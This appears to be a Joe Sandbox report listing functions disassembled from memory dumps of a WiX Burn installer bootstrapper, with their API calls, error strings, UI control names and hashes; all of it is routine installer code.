Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$Pointer$Read
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$\CiH$burn$section.cpp
API String ID: 2600052162-1494491685
Opcode ID: 7c33d5f96b6315ef2d91fe5cc324e8182ffb0145c6e29e3ac92f1e25bb79edc3
Instruction ID: 3d7ea80938fb8797f6e184cc252f0c7b5a24d8992c4b51cd59f17bfbd03f287a
Opcode Fuzzy Hash: 7c33d5f96b6315ef2d91fe5cc324e8182ffb0145c6e29e3ac92f1e25bb79edc3
Instruction Fuzzy Hash: F412E171E40325ABEF20AB64DD41FAB76ABEF44700F01416AFD09EB680DB718D41CBA5

Function 6C8D9B79 Relevance: 82.7, APIs: 30, Strings: 17, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Billboard,000000FF,00000080,?,00000080,?,?), ref: 6C8D9CAF
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Button,000000FF), ref: 6C8D9CCE
SysFreeString.OLEAUT32(00000000), ref: 6C8DA005

Part of subcall function 6C8D5B06: GetProcessHeap.KERNEL32(?,?,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?), ref: 6C8D5B17
Part of subcall function 6C8D5B06: RtlAllocateHeap.NTDLL(00000000,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?,00000001), ref: 6C8D5B1E

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,6C8F2180,00000001), ref: 6C8D9CE9
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Checkbox,000000FF), ref: 6C8D9D04
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,6C8F21E0,00000002), ref: 6C8D9D1F
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Editbox,000000FF), ref: 6C8D9D3A
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,6C8F21F8,00000002), ref: 6C8D9D55
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Hyperlink,000000FF), ref: 6C8D9D70
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,6C8F2214,00000001), ref: 6C8D9D8B
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,Hypertext,000000FF), ref: 6C8D9DA6
SysFreeString.OLEAUT32(00000000), ref: 6C8DA058

Strings

Hypertext, xrefs: 6C8D9D98
Treeview, xrefs: 6C8D9F28
Progressbar, xrefs: 6C8D9DEC
Text, xrefs: 6C8D9E8E
Richedit, xrefs: 6C8D9E22
Hyperlink, xrefs: 6C8D9D62
Static, xrefs: 6C8D9E58
thmutil.cpp, xrefs: 6C8D9C2A
Listview, xrefs: 6C8D9EDF
ListView, xrefs: 6C8D9EC4
Image, xrefs: 6C8D9DB6
Checkbox, xrefs: 6C8D9CF6
Editbox, xrefs: 6C8D9D2C
TreeView, xrefs: 6C8D9F11
Tab, xrefs: 6C8D9F56
Billboard, xrefs: 6C8D9CA1
Button, xrefs: 6C8D9CC0

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: String$Compare$FreeHeap$AllocateProcess
String ID: Billboard$Button$Checkbox$Editbox$Hyperlink$Hypertext$Image$ListView$Listview$Progressbar$Richedit$Static$Tab$Text$TreeView$Treeview$thmutil.cpp
API String ID: 1229322287-58397606
Opcode ID: e7d5f125e099f65c4382bafb4b86343ca3f7600b0b6b49caf91ea25f94452f55
Instruction ID: 43c7038563f9f88632d4969bed7336583e4f5913c9957c1ed5f9aee96ea8e0e1
Opcode Fuzzy Hash: e7d5f125e099f65c4382bafb4b86343ca3f7600b0b6b49caf91ea25f94452f55
Instruction Fuzzy Hash: 3BE1E931A8C21ABADF319A94CE42FAD7621AF45774F320F14F630BA6D0CA717941EB51

Function 6C8D940E Relevance: 58.4, APIs: 2, Strings: 31, Instructions: 624COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(6C8D9FC4), ref: 6C8D9B68

Part of subcall function 6C8DC938: VariantInit.OLEAUT32(00000000), ref: 6C8DC94E
Part of subcall function 6C8DC938: SysAllocString.OLEAUT32(?), ref: 6C8DC96A
Part of subcall function 6C8DC938: VariantClear.OLEAUT32(?), ref: 6C8DC9F1
Part of subcall function 6C8DC938: SysFreeString.OLEAUT32(00000000), ref: 6C8DC9FC

SysFreeString.OLEAUT32(6C8D9FC4), ref: 6C8D9843

Strings

HexExtendedStyle, xrefs: 6C8D9939
StringId, xrefs: 6C8D97D9
SourceY, xrefs: 6C8D95F1
ImageListGroupHeader, xrefs: 6C8D9A0F
SourceX, xrefs: 6C8D95B9
Height, xrefs: 6C8D952B
HexStyle, xrefs: 6C8D96D3
ImageListSmall, xrefs: 6C8D99A1
HasLines, xrefs: 6C8D9B2E
thmutil.cpp, xrefs: 6C8D9461
AlwaysShowSelect, xrefs: 6C8D9AE2
FullRowSelect, xrefs: 6C8D9A8B
DisablePrefix, xrefs: 6C8D98FA
Visible, xrefs: 6C8D9755
EnableDragDrop, xrefs: 6C8D9A5E
HasButtons, xrefs: 6C8D9AB8
Center, xrefs: 6C8D98CC
Width, xrefs: 6C8D9565
ImageList, xrefs: 6C8D996A
HoverFontId, xrefs: 6C8D9661
SelectedFontId, xrefs: 6C8D9699
Loop, xrefs: 6C8D9863
FontId, xrefs: 6C8D9629
LinesAtRoot, xrefs: 6C8D9B08
ImageListState, xrefs: 6C8D99D8
FileSystemAutoComplete, xrefs: 6C8D97AE
TabStop, xrefs: 6C8D9702
Interval, xrefs: 6C8D988D
Name, xrefs: 6C8D9493
HideWhenDisabled, xrefs: 6C8D9783
sid, xrefs: 6C8D97EF

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: String$Free$Variant$AllocClearInit
String ID: AlwaysShowSelect$Center$DisablePrefix$EnableDragDrop$FileSystemAutoComplete$FontId$FullRowSelect$HasButtons$HasLines$Height$HexExtendedStyle$HexStyle$HideWhenDisabled$HoverFontId$ImageList$ImageListGroupHeader$ImageListSmall$ImageListState$Interval$LinesAtRoot$Loop$Name$SelectedFontId$SourceX$SourceY$StringId$TabStop$Visible$Width$sid$thmutil.cpp
API String ID: 3564436086-2239863677
Opcode ID: 76c66ac3a7b8d404d655c4115ce2e5a2273ebb7a08bd0bffe5ff68918443ac40
Instruction ID: b89a33ea89f87e03dfdabd8740e6be269d6912d3a0c580dfb23cabff7c59b59b
Opcode Fuzzy Hash: 76c66ac3a7b8d404d655c4115ce2e5a2273ebb7a08bd0bffe5ff68918443ac40
Instruction Fuzzy Hash: 6E12D872C11138BBCB31EA558B90EEE776C9B05698F030EB4EC50ABA41DB24FD45D7A1

Function 6C8DB75B Relevance: 51.2, APIs: 16, Strings: 13, Instructions: 424
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32(?,6C8FA028), ref: 6C8DB792
CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 6C8DB97D
CreateWindowExW.USER32(?,Static,?,?,?,?,?,?,74C0850C,?,00000000,00000000), ref: 6C8DBA00
SHAutoComplete.SHLWAPI(00000000,00000010), ref: 6C8DBA23
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 6C8DBA53
SendMessageW.USER32(?,00001061,00000000,0000000F), ref: 6C8DBAB9
SendMessageW.USER32(?,00001003,00000003,?), ref: 6C8DBB02
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 6C8DBB32
SendMessageW.USER32(?,00000445,00000000,04010000), ref: 6C8DBB47
GetClassLongA.USER32(74C0850C,000000F6), ref: 6C8DBB7A
SetClassLongA.USER32(?,000000F6,00000000), ref: 6C8DBB86
SendMessageW.USER32(?,0000133E,00000000,00000003), ref: 6C8DBBCA
SendMessageW.USER32(?,00000030,?,00000000), ref: 6C8DBBF1
GetLastError.KERNEL32 ref: 6C8DBC27
GetLastError.KERNEL32 ref: 6C8DBC4D
GetLastError.KERNEL32 ref: 6C8DBC73

Strings

+, xrefs: 6C8DB894
Edit, xrefs: 6C8DB877
SysTabControl32, xrefs: 6C8DB86D
Static, xrefs: 6C8DB7B2, 6C8DB9FC
thmutil.cpp, xrefs: 6C8DBCA6
msctls_progress32, xrefs: 6C8DB8F9
SysListView32, xrefs: 6C8DB859
RichEdit20W, xrefs: 6C8DB927
ThemeHyperLink, xrefs: 6C8DB88F
SysTreeView32, xrefs: 6C8DB863
Riched20.dll, xrefs: 6C8DB90E
SysLink, xrefs: 6C8DB8A0
Button, xrefs: 6C8DB814

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: MessageSend$ErrorLast$ClassLong$AutoClientCompareCompleteCreateRectStringWindow
String ID: +$Button$Edit$RichEdit20W$Riched20.dll$Static$SysLink$SysListView32$SysTabControl32$SysTreeView32$ThemeHyperLink$msctls_progress32$thmutil.cpp
API String ID: 3933361081-283255470
Opcode ID: 20114bcc61bc4ff886da6687454c610ce9b9fcd351bd1caa61b5454068f61cd6
Instruction ID: df7f3c06ae5119f9486e6a66932ca133924f701736ae4e3d9a5924ddf17b9766
Opcode Fuzzy Hash: 20114bcc61bc4ff886da6687454c610ce9b9fcd351bd1caa61b5454068f61cd6
Instruction Fuzzy Hash: 33F19071D01209EFDF24CF69CA80BAD77F5FF49314F22856AE911AB694D731A842CB90

Function 0069508D Relevance: 44.1, APIs: 5, Strings: 20, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0069510F

Part of subcall function 006D03F0: InitializeCriticalSection.KERNEL32(006FB60C,?,0069511B,00000000,?,?,?,?,?,?), ref: 006D0407

Part of subcall function 00691209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00695137,00000000,?), ref: 00691247
Part of subcall function 00691209: GetLastError.KERNEL32(?,?,?,00695137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00691251

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0069517D

Part of subcall function 006D0CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 006D0CF2

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 0069520F
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00695219
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0069549B

Strings

Failed to initialize COM., xrefs: 00695189
Failed to initialize core., xrefs: 006952BB
Failed to run embedded mode., xrefs: 0069533C
Failed to initialize Regutil., xrefs: 006951C1
engine.cpp, xrefs: 0069523D
txt, xrefs: 006953F2
Failed to initialize Cryputil., xrefs: 0069519E
3.10.4.4718, xrefs: 0069527C
Failed to initialize Wiutil., xrefs: 006951D9
_Failed, xrefs: 006953F7
Failed to run untrusted mode., xrefs: 006953AE
Failed to run RunOnce mode., xrefs: 00695314
Failed to get OS info., xrefs: 00695247
Setup, xrefs: 006953FC
Failed to parse command line., xrefs: 0069513D
Failed to initialize engine state., xrefs: 00695164
Failed to initialize XML util., xrefs: 006951F1
Failed to run per-machine mode., xrefs: 00695364
Invalid run mode., xrefs: 006952F1
Failed to run per-user mode., xrefs: 0069538C

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.10.4.4718$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
API String ID: 3262001429-867073019
Opcode ID: 095605b221f3c8db9fb4543646b3c2611cf8941858239d15ece8d6a319139ca9
Instruction ID: f682bad1a34ccfe3270a616cdd49a16c0f144e9a9ea84a8cad31a05b56635fe2
Opcode Fuzzy Hash: 095605b221f3c8db9fb4543646b3c2611cf8941858239d15ece8d6a319139ca9
Instruction Fuzzy Hash: 51B1D571D40A299BDF73AF64CC46BED76AFAF04710F05009AF90AA6741DB709E818F94

Function 0069567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,006999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 006956A2
lstrlenW.KERNEL32(00000000,?,006999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 006956AC
_wcschr.LIBVCRUNTIME ref: 006958B4
LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,006999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 00695B56

Strings

Failed to allocate string., xrefs: 00695AD1
Failed to allocate buffer for format string., xrefs: 006956CA
Failed to format placeholder string., xrefs: 00695963
Failed to set variable value., xrefs: 0069596D
Failed to append string., xrefs: 00695728
Failed to set record string., xrefs: 00695AA2
Failed to reallocate variable array., xrefs: 00695938
*****, xrefs: 00695820
Failed to allocate variable array., xrefs: 00695991
Failed to set record format string., xrefs: 006959DD
Failed to get formatted length., xrefs: 00695A6D
Failed to copy string., xrefs: 00695B3A
Failed to append placeholder., xrefs: 00695959
[%d], xrefs: 0069586F
Failed to allocate record., xrefs: 00695917
Failed to determine variable visibility: '%ls'., xrefs: 00695946
Failed to format record., xrefs: 00695B1A
variable.cpp, xrefs: 0069590A, 0069592B, 00695984, 006959D0, 00695A60, 00695A95, 00695B0D
Failed to get variable name., xrefs: 00695998

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 0ab01e72942abf8051d2d7c34e189eb956cd6d5bf7626ede855071cab206b505
Instruction ID: abb622c3340a5280c6c49dd32e9850114e9eea8d34e7e8c613ec415be080bd47
Opcode Fuzzy Hash: 0ab01e72942abf8051d2d7c34e189eb956cd6d5bf7626ede855071cab206b505
Instruction Fuzzy Hash: 0CF19F71D00629EEDF229FA48841AAF7BAFEF04750F11412AFD16AB740D7349E01CBA5

Function 006A7337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract bootstrapper application payloads., xrefs: 006A75DD
Failed to overwrite the %ls built-in variable., xrefs: 006A74C9
WixBundleOriginalSource, xrefs: 006A7547
WixBundleSourceProcessPath, xrefs: 006A74E6
Failed to get manifest stream from container., xrefs: 006A73D9
WixBundleSourceProcessFolder, xrefs: 006A7522
Failed to load manifest., xrefs: 006A73F5
Failed to open manifest stream., xrefs: 006A73B8
WixBundleElevated, xrefs: 006A74B3, 006A74C4
Failed to set original source variable., xrefs: 006A7558
Failed to load catalog files., xrefs: 006A75FD
Failed to set source process folder variable., xrefs: 006A7533
Failed to parse command line., xrefs: 006A7474
Failed to open attached UX container., xrefs: 006A739B
Failed to initialize variables., xrefs: 006A737E
Failed to get source process folder from path., xrefs: 006A7513
Failed to initialize internal cache functionality., xrefs: 006A758D
Failed to get unique temporary folder for bootstrapper application., xrefs: 006A75BC
Failed to set source process path variable., xrefs: 006A74F7

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
API String ID: 32694325-252221001
Opcode ID: f3f8bab308dbbcd3cb920c28a4374fd5e6b7268a2aee9ed0a457bcc1b2920bb5
Instruction ID: 3fa62f5f409f57b78bc35688553da89659f65c19d490eddab2fba943e26b2e2c
Opcode Fuzzy Hash: f3f8bab308dbbcd3cb920c28a4374fd5e6b7268a2aee9ed0a457bcc1b2920bb5
Instruction Fuzzy Hash: 81917672D45A1ABBCB12AAA4CC41FEEB7AEBF05710F01422AF505E7241DB309E458FD4

Function 00697503 Relevance: 33.4, APIs: 1, Strings: 21, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(006A7378,006952B5,00000000,0069533D), ref: 00697523

Strings

LogonUser, xrefs: 006977B2
WixBundleAction, xrefs: 00697C90
InstallerVersion, xrefs: 0069771E
WixBundleSourceProcessPath, xrefs: 00697D6D
WixBundleVersion, xrefs: 00697DAC
WixBundleExecutePackageCacheFolder, xrefs: 00697CAC
$, xrefs: 00697C54
WixBundleActiveParent, xrefs: 00697D47
Date, xrefs: 00697642
WixBundleTag, xrefs: 00697D99
WixBundleInstalled, xrefs: 00697D12
WixBundleSourceProcessFolder, xrefs: 00697D86
WixBundleProviderKey, xrefs: 00697D5A
#, xrefs: 0069759C
InstallerName, xrefs: 006976F8
', xrefs: 006977E2
WixBundleElevated, xrefs: 00697D2E
WixBundleExecutePackageAction, xrefs: 00697CCE
WixBundleForcedRestartPackage, xrefs: 00697CF0
0, xrefs: 0069753D
Failed to add built-in variable: %ls., xrefs: 00697DF0

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
API String ID: 32694325-826827252
Opcode ID: 48903e19ce1f2fb9606878dac906171d5491a897cdbd372999f73faa88256366
Instruction ID: 79d566859bc35a5fd14518e7f9cc47a201e19709bc43d1db7da486fec8d64cfd
Opcode Fuzzy Hash: 48903e19ce1f2fb9606878dac906171d5491a897cdbd372999f73faa88256366
Instruction Fuzzy Hash: 1D3216B0C2527D8BDB65CF59898879DBEB9BB49B14F5081DBE10CAA311D7B10A84CF84

Function 6C8D1CE0 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#(loc.ConfirmCancelMessage), xrefs: 6C8D1D9A
Failed to load loc file from path: %ls, xrefs: 6C8D1D47
#(loc.SuccessHeader), xrefs: 6C8D1E16
Failed to localize confirm close message: %ls, xrefs: 6C8D1DC5
thm.wxl, xrefs: 6C8D1CE9
SuccessInstallHeader, xrefs: 6C8D1E2F
SuccessUninstallHeader, xrefs: 6C8D1E69
#(loc.SuccessInstallHeader), xrefs: 6C8D1DF8
Failed to set WixStdBALanguageId variable., xrefs: 6C8D1D86
FailureRepairHeader, xrefs: 6C8D1EB3
FailureInstallHeader, xrefs: 6C8D1E98
mbapreq.wxl, xrefs: 6C8D1CF1, 6C8D1D0C, 6C8D1D1E
Failed to probe for loc file: %ls in path: %ls, xrefs: 6C8D1D1F
#(loc.FailureHeader), xrefs: 6C8D1E7F
SuccessRepairHeader, xrefs: 6C8D1E4E
WixStdBALanguageId, xrefs: 6C8D1D77
FailureUninstallHeader, xrefs: 6C8D1ECE

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Default$LangLanguageSystemUser
String ID: #(loc.ConfirmCancelMessage)$#(loc.FailureHeader)$#(loc.SuccessHeader)$#(loc.SuccessInstallHeader)$Failed to load loc file from path: %ls$Failed to localize confirm close message: %ls$Failed to probe for loc file: %ls in path: %ls$Failed to set WixStdBALanguageId variable.$FailureInstallHeader$FailureRepairHeader$FailureUninstallHeader$SuccessInstallHeader$SuccessRepairHeader$SuccessUninstallHeader$WixStdBALanguageId$mbapreq.wxl$thm.wxl
API String ID: 4175731448-3264773947
Opcode ID: e43f7dfcd0b306c6f80e85f4f9f67de9c80a02895de17c2d80405d2c0967dd31
Instruction ID: 16e06665e9668248ac8cde6a61dd281b8634185236ac2f97c65adfc2e962f093
Opcode Fuzzy Hash: e43f7dfcd0b306c6f80e85f4f9f67de9c80a02895de17c2d80405d2c0967dd31
Instruction Fuzzy Hash: 5851603640151ABFDB325B58DE40E897BB5AF09364F138D64F914ABA20DB31ED14EB90

Function 006A80AE Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00695381), ref: 006A8104

Part of subcall function 006D076C: OpenProcessToken.ADVAPI32(?,00000008,?,006952B5,00000000,?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D078A
Part of subcall function 006D076C: GetLastError.KERNEL32(?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D0794
Part of subcall function 006D076C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D081D

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 006A812A
GetLastError.KERNEL32 ref: 006A8134
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 006A81B1
GetLastError.KERNEL32 ref: 006A81BB

Strings

Failed to concat Temp directory on windows path for working folder., xrefs: 006A81A1
cache.cpp, xrefs: 006A8158, 006A81DF, 006A8230
Failed to create working folder guid., xrefs: 006A8207
Failed to get temp path for working folder., xrefs: 006A81E9
%ls%ls\, xrefs: 006A824C
Failed to get windows path for working folder., xrefs: 006A8162
Failed to append bundle id on to temp path for working folder., xrefs: 006A8264
Failed to ensure windows path for working folder ended in backslash., xrefs: 006A817F
Temp\, xrefs: 006A8189
Failed to copy working folder path., xrefs: 006A827F
Failed to convert working folder guid into string., xrefs: 006A823A

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$Process$CloseCurrentDirectoryHandleOpenPathTempTokenWindows
String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
